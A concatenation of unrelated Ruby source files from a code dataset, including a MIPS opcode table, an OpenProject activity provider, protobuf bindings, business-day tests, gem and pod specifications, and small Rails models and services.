addop "c.#{cond}.#{type_str}", type, 0b110000+index, 'cc, fs, ft',
[ :ft, :fs, :cc ]
end
end
# S and D Without PS
[:cop1_s, :cop1_d].each do |type|
macro_addop_cop1_precision 'div', type, 0b000011, 'fd, fs, ft'
macro_addop_cop1_precision 'sqrt', type, 0b000100, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'round.w', type, 0b001100, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'trunc.w', type, 0b001101, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'ceil.w', type, 0b001110, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'floor.w', type, 0b001111, 'fd, fs', :ft_zero
end
# COP2 is not decoded (pretty useless)
[:cop1_d,:cop1_w].each { |type| macro_addop_cop1_precision 'cvt.s', type, 0b100000, 'fd, fs', :ft_zero }
[:cop1_s,:cop1_w].each { |type| macro_addop_cop1_precision 'cvt.d', type, 0b100001, 'fd, fs', :ft_zero }
[:cop1_s,:cop1_d].each { |type| macro_addop_cop1_precision 'cvt.w', type, 0b100100, 'fd, fs', :ft_zero }
[ :normal, :special, :regimm, :special2, :cop0, :cop0_c0, :cop1, :cop1_s,
:cop1_d, :cop1_w ].each \
{ |t| @@opcodes_by_class[t] = opcode_list.find_all { |o| o.type == t } }
end
# Initialize the instruction set with the MIPS32 Instruction Set Release 2
def init_mips64
init_mips32
#SPECIAL
macro_addop_special "rotr", 0b000010, 'rd, rt, sa', :diff_bits, [ 26, 1, 1 ]
macro_addop_special "rotrv", 0b000110, 'rd, rt, rs', :diff_bits, [ 6, 1, 1 ]
# REGIMM
addop "synci", :regimm, 0b11111, '', {:base => [5,21], :off => [16, 0] }
# ---------------------------------------------------------------
# SPECIAL3 opcode encoding of function field
# ---------------------------------------------------------------
addop "ext", :special3, 0b00000, 'rt, rs, pos, size', { :rs => [5, 21], :rt => [5, 16],
:msbd => [5, 11], :lsb => [5, 6] }
addop "ins", :special3, 0b00100, 'rt, rs, pos, size', { :rs => [5, 21], :rt => [5, 16],
:msb => [5, 11], :lsb => [5, 6] }
addop "rdhwr", :special3, 0b111011, 'rt, rd', { :rt => [5, 16], :rd => [5, 11] }
addop "wsbh", :bshfl, 0b00010, 'rd, rt', { :rt => [5, 16], :rd => [5, 11] }
addop "seb", :bshfl, 0b10000, 'rd, rt', { :rt => [5, 16], :rd => [5, 11] }
addop "seh", :bshfl, 0b11000, 'rd, rt', { :rt => [5, 16], :rd => [5, 11] }
# ---------------------------------------------------------------
# COP0
# ---------------------------------------------------------------
addop "rdpgpr", :cop0, 0b01010, 'rt, rd', {:rt => [5, 16], :rd => [5, 11] }
addop "wdpgpr", :cop0, 0b01110, 'rt, rd', {:rt => [5, 16], :rd => [5, 11] }
addop "di", :cop0, 0b01011, '', {}, :diff_bits, [ 5, 1 , 0]
addop "ei", :cop0, 0b01011, '', {}, :diff_bits, [ 5, 1 , 1]
# ---------------------------------------------------------------
# COP1, field rs
# ---------------------------------------------------------------
macro_addop_cop1 "mfhc1", 0b00011
macro_addop_cop1 "mthc1", 0b00111
# Floating point
[:cop1_s, :cop1_d].each do |type|
macro_addop_cop1_precision 'round.l', type, 0b001000, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'trunc.l', type, 0b001001, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'ceil.l', type, 0b001010, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'floor.l', type, 0b001011, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'recip', type, 0b010101, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'rsqrt', type, 0b010110, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'cvt.l', type, 0b100101, 'fd, fs', :ft_zero
end
macro_addop_cop1_precision 'cvt.ps', :cop1_s, 0b100110, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'cvt.s', :cop1_l, 0b100000, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'cvt.d', :cop1_l, 0b100000, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'add', :cop1_ps, 0b000000, 'fd, fs, ft'
macro_addop_cop1_precision 'sub', :cop1_ps, 0b000001, 'fd, fs, ft'
macro_addop_cop1_precision 'mul', :cop1_ps, 0b000010, 'fd, fs, ft'
macro_addop_cop1_precision 'abs', :cop1_ps, 0b000101, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'mov', :cop1_ps, 0b000110, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'neg', :cop1_ps, 0b000111, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'movz', :cop1_ps, 0b010010, 'fd, fs, ft'
macro_addop_cop1_precision 'movn', :cop1_ps, 0b010011, 'fd, fs, ft'
addop "movf.#{:cop1_ps_str}", :cop1_ps, 0b010001, 'fd, fs, cc', [ :cc, :fs, :fd ]
addop "movt.#{:cop1_ps_str}", :cop1_ps, 0b010001, 'fd, fs, cc', [ :cc, :fs, :fd ]
%w(f un eq ueq olt ult ole ule sf ngle seq ngl lt nge le ngt).each_with_index do |cond, index|
addop "c.#{cond}.ps", :cop1_cond, 0b110000+index, 'cc, fs, ft',
[ :ft, :fs, :cc ]
# TODO: COP1X
[ :special3, :bshfl, :cop1_l, :cop1_ps ].each \
{ |t| @@opcodes_by_class[t] = opcode_list.find_all { |o| o.type == t } }
end
end
# Reset all instructions
def reset
metaprops_allowed.clear
args_allowed.clear
props_allowed.clear
fields_spec.clear
opcode_list.clear
end
end
# Array containing all the supported opcodes
attr_accessor :opcode_list
init_mips32
end
end
| 41.467849 | 202 | 0.576142 |
1845b7cb63a499e3bff81595645fe720e827a7aa | 2,573 | #-- encoding: UTF-8
#-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2017 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
# Activity provider exposing wiki page edits in the project activity view.
class Activity::WikiContentActivityProvider < Activity::BaseActivityProvider
  acts_as_activity_provider type: 'wiki_edits',
                            permission: :view_wiki_edits

  # Joins the wiki page and its wiki onto the activity journal rows so
  # their columns are available for projection and project filtering.
  def extend_event_query(query, activity)
    page_join = activity_journals_table(activity)[:page_id].eq(wiki_pages_table[:id])
    wiki_join = wiki_pages_table[:wiki_id].eq(wikis_table[:id])

    query.join(wiki_pages_table).on(page_join)
    query.join(wikis_table).on(wiki_join)
  end

  # Extra columns selected alongside the journal columns.
  def event_query_projection(_activity)
    [projection_statement(wikis_table, :project_id, 'project_id'),
     projection_statement(wiki_pages_table, :title, 'wiki_title')]
  end

  # The wikis table carries the project_id used for scoping.
  def projects_reference_table(_activity)
    wikis_table
  end

  protected

  def event_title(event, _activity)
    "#{l(:label_wiki_edit)}: #{event['wiki_title']} (##{event['version']})"
  end

  def event_type(_event, _activity)
    'wiki-page'
  end

  def event_path(event, _activity)
    path_args = url_helper_parameter(event)
    url_helpers.project_wiki_path(*path_args)
  end

  def event_url(event, _activity)
    url_args = url_helper_parameter(event)
    url_helpers.project_wiki_url(*url_args)
  end

  private

  def wiki_pages_table
    @wiki_pages_table ||= WikiPage.arel_table
  end

  def wikis_table
    @wikis_table ||= Wiki.arel_table
  end

  # [project identifier, page title, { version: n }] for the wiki URL helpers.
  def url_helper_parameter(event)
    [event['project_id'], event['wiki_title'], { version: event['version'] }]
  end
end
| 31.378049 | 106 | 0.74077 |
f84449900b1cea6bded95918ccc111e85370b5f8 | 2,783 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/vision/v1p3beta1/web_detection.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
# Generated descriptor registration for web_detection.proto — do not
# hand-edit; regenerate from the .proto source instead.
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/cloud/vision/v1p3beta1/web_detection.proto", :syntax => :proto3) do
add_message "google.cloud.vision.v1p3beta1.WebDetection" do
repeated :web_entities, :message, 1, "google.cloud.vision.v1p3beta1.WebDetection.WebEntity"
repeated :full_matching_images, :message, 2, "google.cloud.vision.v1p3beta1.WebDetection.WebImage"
repeated :partial_matching_images, :message, 3, "google.cloud.vision.v1p3beta1.WebDetection.WebImage"
repeated :pages_with_matching_images, :message, 4, "google.cloud.vision.v1p3beta1.WebDetection.WebPage"
repeated :visually_similar_images, :message, 6, "google.cloud.vision.v1p3beta1.WebDetection.WebImage"
repeated :best_guess_labels, :message, 8, "google.cloud.vision.v1p3beta1.WebDetection.WebLabel"
end
add_message "google.cloud.vision.v1p3beta1.WebDetection.WebEntity" do
optional :entity_id, :string, 1
optional :score, :float, 2
optional :description, :string, 3
end
add_message "google.cloud.vision.v1p3beta1.WebDetection.WebImage" do
optional :url, :string, 1
optional :score, :float, 2
end
add_message "google.cloud.vision.v1p3beta1.WebDetection.WebPage" do
optional :url, :string, 1
optional :score, :float, 2
optional :page_title, :string, 3
repeated :full_matching_images, :message, 4, "google.cloud.vision.v1p3beta1.WebDetection.WebImage"
repeated :partial_matching_images, :message, 5, "google.cloud.vision.v1p3beta1.WebDetection.WebImage"
end
add_message "google.cloud.vision.v1p3beta1.WebDetection.WebLabel" do
optional :label, :string, 1
optional :language_code, :string, 2
end
end
end
# Ruby constants resolving to the message classes registered above.
module Google
module Cloud
module Vision
module V1p3beta1
WebDetection = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1p3beta1.WebDetection").msgclass
WebDetection::WebEntity = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1p3beta1.WebDetection.WebEntity").msgclass
WebDetection::WebImage = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1p3beta1.WebDetection.WebImage").msgclass
WebDetection::WebPage = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1p3beta1.WebDetection.WebPage").msgclass
WebDetection::WebLabel = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1p3beta1.WebDetection.WebLabel").msgclass
end
end
end
end
| 52.509434 | 155 | 0.754941 |
4a0229300b8863d38c80882be8d255500511155a | 878 | require 'test_helper'
# Exercises the configurable pieces of Authlogic::I18n: the lookup scope
# and the pluggable translator object.
class I18nTest < ActiveSupport::TestCase
  def test_uses_authlogic_as_scope_by_default
    assert_equal :authlogic, Authlogic::I18n.scope
  end

  def test_can_set_scope
    assert_nothing_raised { Authlogic::I18n.scope = [:a, :b] }
    assert_equal [:a, :b], Authlogic::I18n.scope
    # Put the default scope back so other tests are unaffected.
    Authlogic::I18n.scope = :authlogic
  end

  def test_uses_built_in_translator_by_default
    assert_equal Authlogic::I18n::Translator, Authlogic::I18n.translator.class
  end

  def test_can_set_custom_translator
    original_translator = Authlogic::I18n.translator
    assert_nothing_raised do
      # Any object responding to #translate(key, options) is a valid translator.
      custom_translator_class = Class.new do
        def translate(key, _options = {})
          "Translated: #{key}"
        end
      end
      Authlogic::I18n.translator = custom_translator_class.new
    end
    assert_equal "Translated: x", Authlogic::I18n.translate(:x)
    # Put the built-in translator back so other tests are unaffected.
    Authlogic::I18n.translator = original_translator
  end
end
6a10341f3248de5dcf76c2dee11aefbd0810472d | 5,870 | # rubocop:disable Style/FrozenStringLiteralComment
require 'conditions_generator_column_string_regexped' # Used to generate simple_search query condition
#
# = SwimmerFuzzyFinder
#
# - Goggles framework vers.: 6.071
# - author: Steve A.
#
# Fuzzy-finder class used to retrieve lists of Swimmer instances based
# upon a versatile "fuzzy" search query.
#
class SwimmerFuzzyFinder
  attr_reader :first_name, :last_name, :complete_name, :year_of_birth, :gender_code,
              :limit

  # Executes the search call.
  #
  # == Params:
  # An Hash-like list of parameter values, specifying the corresponding Swimmer
  # field value.
  #
  # All parameters are optional but at least one must be specified.
  # Whenever present, the couple :first_name & :last_name take precedence
  # over :complete_name (even though this is the "main" search field).
  #
  # - :first_name,
  # - :last_name,
  # - :complete_name (main search field),
  # - :year_of_birth (either as String or Fixnum),
  # - :gender_type_id (takes precedence over :gender_code)
  # - :gender_code (specifying this will issue an additional query)
  # - :limit for the results found
  #
  # == Returns:
  # A list of matching Swimmer instances; an empty array otherwise.
  #
  def self.call(*args)
    new(*args).call
  end

  # Creates a new finder instance. See self.call() for parameters.
  #
  def initialize(params)
    # These two may be null inside a Swimmer row:
    @first_name = params[:first_name]
    @last_name = params[:last_name]
    # :complete_name is never null in Swimmer and thus is the main search field
    @complete_name = params[:complete_name]
    @year_of_birth = params[:year_of_birth]
    @gender_type_id = params[:gender_type_id]
    @gender_code = params[:gender_code]
    @limit = params[:limit]
    normalize_names
    normalize_gender
  end

  # Executes the search given the stored parameters.
  #
  def call
    filter_by_gender(filter_by_birth(search_by_name))
  end

  private

  # Swimmer name parameter normalizer.
  # It assumes that all the variables may be nil.
  #
  # When either complete_name or the couple last_name & first_name are not nil or
  # empty, the result of the normalization is to define a coherent value for all
  # 3 fields, assuming that for most DB rows it is expected that:
  #
  #   complete_name = last_name + ' ' + first_name
  #
  def normalize_names
    # When given, last_name & first_name take precedence over complete_name:
    if !@first_name.to_s.empty? || !@last_name.to_s.empty?
      @complete_name = [@last_name, @first_name].join(' ')
    elsif !@complete_name.to_s.empty?
      # Normalize multi-space separator between last_name and first_name.
      # We must find a "separator length" that at least results in a
      # last_name+first_name array:
      splitted_name = @complete_name.gsub(/\s{3,}/, ' ').split(' ')
      # NOTE(review): this fallback re-splits the first token with the same
      # single-space separator, so it can never yield more tokens; possibly a
      # wider separator was intended on the line above — confirm against history.
      splitted_name = (splitted_name[0]).split(' ') if splitted_name.size < 2
      if splitted_name.size == 2 # Use last & first name only when the splitting is certain
        @last_name = splitted_name[0]
        @first_name = splitted_name.reject { |s| s == @last_name }.join(' ')
      end
      @complete_name = @complete_name.gsub(/\s+/, ' ')
    end
  end

  # Swimmer gender type parameter normalizer.
  # It assumes that all the variables may be nil.
  # The result of the normalization is a GenderType.id usable for a WHERE clause.
  #
  def normalize_gender
    @gender_type_id = GenderType::TYPES_HASH.key(@gender_code) if @gender_code
  end
  #-- --------------------------------------------------------------------------
  #++

  # Searches swimmers based on possible name matches, escalating from an exact
  # match, to a RegExp-based match, to a fuzzy match on a pre-filtered set.
  # Returns an array of matching rows; an empty array when no matches are found.
  #
  def search_by_name
    # 1) Simple query, searching for a name "as-is":
    swimmers = Swimmer.where(complete_name: @complete_name).limit(@limit)
    # 2) RegExp query on name (empty? avoids issuing an extra COUNT query):
    if swimmers.empty? && !@complete_name.to_s.empty?
      # Search among Swimmers for an equal complete name:
      name_clause = ConditionsGeneratorColumnStringRegexped
                    .generate_query_conditions('swimmers', 'complete_name', @complete_name)
      swimmers = Swimmer.where(name_clause).limit(@limit)
    end
    # 3) Fuzzy search on a pre-filtered complete_name
    if swimmers.empty? && !@complete_name.to_s.empty?
      matcher = FuzzyStringMatcher.new(prefilter_by_name_start, :complete_name)
      # The resulting bias score is not used here, only the matched rows:
      _final_bias_score, results = matcher.seek_deep_match(
        @complete_name,
        FuzzyStringMatcher::BIAS_SCORE_MAX, # Starting target score
        FuzzyStringMatcher::BIAS_SCORE_MIN  # Min. acceptable score
      )
      swimmers = results.map { |hash| hash[:row] }
    end
    swimmers.to_a
  end

  # (Pre-)Filters Swimmers based on the most significant part of the complete_name.
  # Returns the filtered set.
  #
  def prefilter_by_name_start
    search_token = "%#{@complete_name[0..3]}%"
    Swimmer.where('(complete_name LIKE ?)', search_token).limit(@limit)
  end

  # Filters Swimmers array based on year of birth.
  # Returns the filtered array.
  #
  def filter_by_birth(swimmers_list)
    if @year_of_birth
      year = @year_of_birth.to_i
      # NOTE(review): the +/-4 range check already includes the exact year, so
      # the first (exact && !is_year_guessed) clause is currently redundant;
      # possibly guessed years were meant to get the tolerance and exact years
      # an exact match only — confirm the intended semantics.
      swimmers_list.find_all do |s|
        (s.year_of_birth == year && !s.is_year_guessed) ||
          (year - 4..year + 4).include?(s.year_of_birth)
      end
    else
      swimmers_list
    end
  end

  # Filters Swimmers array based on gender type id.
  # Returns the filtered array.
  #
  def filter_by_gender(swimmers_list)
    if @gender_type_id
      swimmers_list.find_all { |s| s.gender_type_id == @gender_type_id.to_i }
    else
      swimmers_list
    end
  end
  #-- --------------------------------------------------------------------------
  #++
end
# rubocop:enable Style/FrozenStringLiteralComment
| 34.127907 | 102 | 0.672572 |
111f0a9a715a6677c052d447b41b48d18220ce55 | 11,365 | require File.expand_path('../helper', __FILE__)
describe "business days" do
describe "with a standard Time object" do
describe "when adding/subtracting positive business days" do
  # NOTE(review): several examples append to BusinessTime::Config.holidays
  # without removing the entry afterwards; presumably the test helper resets
  # the configuration between examples — confirm.
  it "should move to tomorrow if we add a business day" do
    first = Time.parse("April 13th, 2010, 11:00 am")
    later = 1.business_day.after(first)
    expected = Time.parse("April 14th, 2010, 11:00 am")
    assert_equal expected, later
  end

  it "should take into account the weekend when adding a day" do
    first = Time.parse("April 9th, 2010, 12:33 pm")
    after = 1.business_day.after(first)
    expected = Time.parse("April 12th, 2010, 12:33 pm")
    assert_equal expected, after
  end

  it "should pick next working day when adding zero days on the weekend" do
    first = Time.parse("April 10th, 2010, 12:33 pm")
    after = 0.business_days.after(first)
    expected = Time.parse("April 12th, 2010, 09:00 am")
    assert_equal expected, after
  end

  it "should pick previous working day when subtracting zero days on the weekend" do
    first = Time.parse("January 30th, 2016, 12:33 pm")
    after = 0.business_days.before(first)
    expected = Time.parse("January 29th, 2016, 09:00 am")
    assert_equal expected, after
  end

  it "should move forward one week when adding 5 business days" do
    first = Time.parse("April 9th, 2010, 12:33 pm")
    after = 5.business_days.after(first)
    expected = Time.parse("April 16th, 2010, 12:33 pm")
    assert_equal expected, after
  end

  it "should take into account a holiday when adding a day" do
    three_day_weekend = Date.parse("July 5th, 2010")
    BusinessTime::Config.holidays << three_day_weekend
    friday_afternoon = Time.parse("July 2nd, 2010, 4:50 pm")
    tuesday_afternoon = 1.business_day.after(friday_afternoon)
    expected = Time.parse("July 6th, 2010, 4:50 pm")
    assert_equal expected, tuesday_afternoon
  end

  it "should take into account a holiday on a weekend" do
    july_4 = Date.parse("July 4th, 2010")
    BusinessTime::Config.holidays << july_4
    friday_afternoon = Time.parse("July 2nd, 2010, 4:50 pm")
    monday_afternoon = 1.business_day.after(friday_afternoon)
    expected = Time.parse("July 5th, 2010, 4:50 pm")
    assert_equal expected, monday_afternoon
  end

  it "should move to tuesday if we add one business day during a weekend" do
    saturday = Time.parse("April 10th, 2010, 11:00 am")
    later = 1.business_days.after(saturday)
    expected = Time.parse("April 13th, 2010, 9:00 am")
    assert_equal expected, later
  end

  it "should move to tuesday if we add one business day during a weekend outside normal business hours" do
    saturday = Time.parse("April 10th, 2010, 11:55 pm")
    later = 1.business_days.after(saturday)
    expected = Time.parse("April 13th, 2010, 9:00 am")
    assert_equal expected, later
  end

  it "should return a business hour when adding one business day from before business hours" do
    wednesday = Time.parse("Wednesday October 14th, 2015, 01:54 am")
    later = 1.business_days.after(wednesday)
    expected = Time.parse("Thursday October 15th, 2015, 09:00 am")
    assert_equal expected, later
  end

  it "should move to thursday if we subtract one business day during a weekend" do
    saturday = Time.parse("April 10th, 2010, 11:00 am")
    before = 1.business_days.before(saturday)
    expected = Time.parse("April 8th, 2010, 9:00 am")
    assert_equal expected, before
  end

  it "should move to thursday if we subtract one business day during a weekend outside normal business hours" do
    saturday = Time.parse("April 10th, 2010, 03:00 am")
    before = 1.business_days.before(saturday)
    expected = Time.parse("April 8th, 2010, 9:00 am")
    assert_equal expected, before
  end

  it "should return a business hour when adding one business day from after business hours" do
    wednesday = Time.parse("Wednesday October 14th, 2015, 21:54 pm")
    later = 1.business_days.after(wednesday)
    expected = Time.parse("Friday October 16th, 2015, 09:00 am")
    assert_equal expected, later
  end

  it "should return a business hour when subtracting one business day from before business hours" do
    wednesday = Time.parse("Wednesday October 14th, 2015, 01:54 am")
    before = 1.business_days.before(wednesday)
    expected = Time.parse("Monday October 12th, 2015, 09:00 am")
    assert before.during_business_hours?
    assert_equal expected, before
  end

  it "should return a business hour when subtracting one business day from after business hours" do
    wednesday = Time.parse("Wednesday October 14th, 2015, 21:54 pm")
    before = 1.business_days.before(wednesday)
    expected = Time.parse("Tuesday October 13th, 2015, 09:00 am")
    assert before.during_business_hours?
    assert_equal expected, before
  end

  it "should move to yesterday if we subtract a business day" do
    first = Time.parse("April 13th, 2010, 11:00 am")
    before = 1.business_day.before(first)
    expected = Time.parse("April 12th, 2010, 11:00 am")
    assert_equal expected, before
  end

  it "should take into account the weekend when subtracting a day" do
    first = Time.parse("April 12th, 2010, 12:33 pm")
    before = 1.business_day.before(first)
    expected = Time.parse("April 9th, 2010, 12:33 pm")
    assert_equal expected, before
  end

  it "should move backward one week when subtracting 5 business days" do
    first = Time.parse("April 16th, 2010, 12:33 pm")
    before = 5.business_days.before(first)
    expected = Time.parse("April 9th, 2010, 12:33 pm")
    assert_equal expected, before
  end
end
describe "when adding/subtracting negative business days" do
  it "should move to yesterday if we add a negative business day" do
    first = Time.parse("April 13th, 2010, 11:00 am")
    before = -1.business_day.after(first)
    expected = Time.parse("April 12th, 2010, 11:00 am")
    assert_equal expected, before
  end

  it "should take into account the weekend when adding a negative day" do
    first = Time.parse("April 12th, 2010, 12:33 pm")
    before = -1.business_day.after(first)
    expected = Time.parse("April 9th, 2010, 12:33 pm")
    assert_equal expected, before
  end

  it "should move backward one week when adding 5 negative business days" do
    first = Time.parse("April 16th, 2010, 12:33 pm")
    before = -5.business_days.after(first)
    expected = Time.parse("April 9th, 2010, 12:33 pm")
    assert_equal expected, before
  end

  it "should take into account a holiday on a weekend when adding a negative day" do
    july_4 = Date.parse("July 4th, 2010")
    BusinessTime::Config.holidays << july_4
    monday_afternoon = Time.parse("July 5th, 2010, 4:50 pm")
    friday_afternoon = -1.business_day.after(monday_afternoon)
    expected = Time.parse("July 2nd, 2010, 4:50 pm")
    assert_equal expected, friday_afternoon
  end

  it "should move to thursday if we add one negative business day during weekend" do
    saturday = Time.parse("April 10th, 2010, 11:00 am")
    before = -1.business_days.after(saturday)
    expected = Time.parse("April 8th, 2010, 09:00 am")
    assert_equal expected, before
  end

  it "should return a business hour when adding one negative business day from before business hours" do
    wednesday = Time.parse("Wednesday October 14th, 2015, 01:54 am")
    before = -1.business_days.after(wednesday)
    expected = Time.parse("Monday October 12th, 2015, 09:00 am")
    assert_equal expected, before
  end

  it "should return a business hour when adding one negative business day from after business hours" do
    wednesday = Time.parse("Wednesday October 14th, 2015, 21:54 pm")
    before = -1.business_days.after(wednesday)
    expected = Time.parse("Tuesday October 13th, 2015, 09:00 am")
    assert_equal expected, before
  end

  it "should move to tomorrow if we subtract a negative business day" do
    first = Time.parse("April 13th, 2010, 11:00 am")
    later = -1.business_day.before(first)
    expected = Time.parse("April 14th, 2010, 11:00 am")
    assert_equal expected, later
  end

  it "should take into account the weekend when subtracting a negative day" do
    first = Time.parse("April 12th, 2010, 12:33 pm")
    later = -1.business_day.before(first)
    expected = Time.parse("April 13th, 2010, 12:33 pm")
    assert_equal expected, later
  end

  it "should move forward one week when subtracting -5 business days" do
    first = Time.parse("April 9th, 2010, 12:33 pm")
    later = -5.business_days.before(first)
    expected = Time.parse("April 16th, 2010, 12:33 pm")
    assert_equal expected, later
  end

  it "should move to tuesday if we subtract one negative business day during a weekend" do
    saturday = Time.parse("April 10th, 2010, 11:00 am")
    later = -1.business_days.before(saturday)
    expected = Time.parse("April 13th, 2010, 09:00 am")
    assert_equal expected, later
  end

  it "should return a business hour when subtracting one negative business day from before business hours" do
    wednesday = Time.parse("Wednesday October 14th, 2015, 01:54 am")
    later = -1.business_days.before(wednesday)
    expected = Time.parse("Thursday October 15th, 2015, 09:00 am")
    assert later.during_business_hours?
    assert_equal expected, later
  end

  it "should return a business hour when subtracting one negative business day from after business hours" do
    wednesday = Time.parse("Wednesday October 14th, 2015, 21:54 pm")
    after = -1.business_days.before(wednesday)
    expected = Time.parse("Friday October 16th, 2015, 09:00 am")
    assert after.during_business_hours?
    assert_equal expected, after
  end
end
it "responds appropriately to <" do
  assert 5.business_days < 10.business_days
  assert !(10.business_days < 5.business_days)
  assert (-1.business_day < 1.business_day)
  assert !(1.business_day < -1.business_day)
end

it "responds appropriately to >" do
  assert !(5.business_days > 10.business_days)
  assert 10.business_days > 5.business_days
  assert 1.business_day > -1.business_day
  assert !(-1.business_day > 1.business_day)
end

it "responds appropriately to ==" do
  assert 5.business_days == 5.business_days
  assert 10.business_days != 5.business_days
  assert(-1.business_day == -1.business_day)
  assert(-1.business_day != -5.business_days)
end

it "won't compare days to hours" do
  assert_raises ArgumentError do
    5.business_days < 5.business_hours
  end
  assert_raises ArgumentError do
    -5.business_days < 5.business_hours
  end
end
end
end
| 42.092593 | 116 | 0.658337 |
61cfb29d964462ca418c663fcc8ab416ffa65031 | 833 | Pod::Spec.new do |s|
# CocoaPods specification for NXCollectionViewDataSource.
s.name = "NXCollectionViewDataSource"
s.version = "1.1.5"
# Fixed typo: "of a NSFetchRequest" -> "or a NSFetchRequest".
s.summary = "Generic data source for UICollectionView using either static data or a NSFetchRequest."
s.homepage = "https://github.com/nxtbgthng/NXCollectionViewDataSource"
s.license = { :type => 'BSD', :file => 'LICENSE.md' }
s.author = { "Tobias Kräntzer" => "[email protected]" }
s.social_media_url = 'https://twitter.com/nxtbgthng'
# Minimum deployment target: iOS 6.0.
s.platform = :ios, '6.0'
s.source = { :git => "https://github.com/nxtbgthng/NXCollectionViewDataSource.git", :tag => "#{s.version}" }
s.source_files = 'NXCollectionViewDataSource/NXCollectionViewDataSource/*.{h,m}'
s.framework = 'CoreData'
s.requires_arc = true
end
| 55.533333 | 123 | 0.594238 |
79c8b51522c48f5129ca39d61bc77ddf1cc5c421 | 1,494 | # coding: utf-8
# Gem packaging for the Alembic Jekyll theme.
Gem::Specification.new do |spec|
spec.name = "alembic-jekyll-theme"
spec.version = "3.0.9"
spec.authors = ["David Darnes"]
spec.email = ["[email protected]"]
spec.summary = %q{A Jekyll boilerplate theme designed to be a starting point for any Jekyll website.}
spec.description = "A Jekyll boilerplate theme designed to be a starting point for any Jekyll website. Rather than starting from scratch, this boilerplate is designed to get the ball rolling immediately."
spec.homepage = "https://alembic.darn.es"
spec.license = "MIT"
spec.metadata["plugin_type"] = "theme"
# Ship only theme content (assets, layouts, includes, sass) plus licensing,
# README, service worker and manifest files; everything else stays out.
spec.files = `git ls-files -z`.split("\x0").select { |f| f.match(%r{^(assets|_layouts|_includes|_sass|LICENSE|README|sw|manifest)}i) }
spec.add_runtime_dependency "jekyll", "~> 3.8"
spec.add_runtime_dependency "jekyll-sitemap", "~> 0.13"
spec.add_runtime_dependency "jekyll-mentions", "~> 1.2"
spec.add_runtime_dependency "jekyll-paginate", "~> 1.1"
spec.add_runtime_dependency "jekyll-seo-tag", "~> 2.3"
spec.add_runtime_dependency "jekyll-redirect-from", "~> 0.12"
spec.add_runtime_dependency "jekyll-default-layout", "~> 0.1"
spec.add_runtime_dependency "jekyll-feed", "~> 0.9"
spec.add_runtime_dependency "jekyll-commonmark", "~> 1.2"
spec.add_runtime_dependency "jekyll-include-cache", "~> 0.1"
spec.add_runtime_dependency "jemoji", "~> 0.9"
spec.add_development_dependency "bundler", "~> 1.14"
end
| 46.6875 | 208 | 0.691432 |
bf610c7c7b66f263c0e83aa54328d7e109d6e916 | 815 | # Ruby wrapper for Colonel Kurtz data
#
# Contents of `data` hash
#
# type:
# block type
# string, lower-cased and dashed, e.g. "hero-photo"
#
# content:
# block content
# hash
#
# blocks:
# block children
# array of `data` hashes
#
module ColonelKurtz
  # Ruby-side representation of a single Colonel Kurtz block.
  #
  # Wraps a `data` hash of the shape documented above (type / content /
  # blocks) and exposes memoized accessors plus lazily built child blocks.
  class Block
    # data - Hash of raw block data; normalized via ColonelKurtz::Data.
    def initialize(data)
      @data = Data.new(data).to_hash
    end

    # Block type as a symbol, derived via ColonelKurtz::Type.
    def type
      @type ||= Type.new(data.fetch("type")).to_sym
    end

    # Block content hash; empty hash when the key is absent.
    def content
      @content ||= data.fetch("content", {})
    end

    # Parent Block injected by #children; nil for root-level blocks.
    # (The previous `attr_reader :parent` was dead code — it was immediately
    # shadowed by this method definition, so it has been removed.)
    def parent
      @parent ||= data.fetch("parent", nil)
    end

    # Child blocks, each constructed with a back-reference to self.
    def children
      @children ||= blocks.map { |child| Block.new(child.merge("parent" => self)) }
    end

    private

    attr_reader :data

    # Raw child-block hashes; empty array when the key is absent.
    def blocks
      data.fetch("blocks", [])
    end
  end
end
| 15.377358 | 80 | 0.579141 |
ff1183c9feeac98d78ccdb2be657664748de2304 | 140 | class AddAvailabilityToProperties < ActiveRecord::Migration[6.1]
def change
  # Reversible: Rails infers the inverse (remove_column) automatically.
  add_column :properties, :availability, :boolean
end
end
| 23.333333 | 64 | 0.778571 |
bf8d36f66585309128e29a353beeaae40490c726 | 1,233 | # frozen_string_literal: true
# An issue raised by a team against a problem, with a simple three-state
# workflow driven either by clicks or by comments.
class Issue < ApplicationRecord
  validates :status, presence: true
